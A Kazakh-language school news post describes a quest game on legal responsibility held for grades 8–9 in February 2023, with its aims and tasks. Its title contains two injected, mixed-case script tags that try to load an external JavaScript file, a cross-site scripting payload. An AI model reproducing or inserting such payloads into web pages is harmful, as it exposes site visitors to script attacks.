«Заңдарды бұзғаны үшін жауапкершілік» квест-ойыны<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.02.2023

2 ақпан 2023 жыл құқық негіздері пәнінің мұғалімі Тастемиров А.Н. 8-9 сынып оқушылары арасында «Заң бұзғаны үшін жауапкершілік» тақырыбында кәмелетке толмағандар арасындағы құқық бұзушылықтың алдын алу бойынша квест ойынын өткізді.

Мақсаты: заңдар мен ережелерге құрметпен қарауды қалыптастыру. Құқықтық мәдениетті қалыптастыру

Міндеттері: - «құқық», «жауапкершілік», «құқық бұзушылық» ұғымдарын білу;

- заңдарды қолдану дағдысын қалыптастыру.

Ойын бірнеше кезеңнен тұрды: миға шабуыл, негізгі ұғымдармен таныстыру. Келесі кезекте оқушылар тапсырмаларды орындау үшін 2 командаға бөлінді.

1-тапсырма. «Кім көп».

2-тапсырма. Оқушылардың құқықтары қандай, міндеттері қандай екенін таратыңыз.

3-тапсырма. «Қылмысты квалификациялау»

4-тапсырма. «Бағдар беру».

Шара соңында рефлексия өткізілді.

Просмотров: 593


Пікір қосу



Деректерді қолтаңбаға қосу